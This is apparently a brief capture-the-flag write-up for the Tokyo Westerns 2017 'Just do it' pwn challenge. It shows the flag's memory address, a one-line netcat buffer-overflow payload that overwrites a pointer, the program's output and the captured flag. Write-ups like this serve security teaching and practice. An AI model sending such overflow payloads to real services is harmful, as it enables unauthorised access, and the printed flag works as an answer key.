Tags: pwn 

Rating: 1.5

```python
flag = 0x0804a080
```
```bash
echo -e "AAAAAAAAAAAAAAAAAAAA\x80\xa0\x04\x08" |nc pwn1.chal.ctf.westerns.tokyo 12345
```


Welcome my secret service. Do you know the password?

Input the password.

TWCTF{pwnable_warmup_I_did_it!}

Original writeup (https://github.com/AnisBoss/CTFs/blob/master/Tokyo%20Westerns%20CTF%203rd%202017/Just%20do%20it/Readme.md).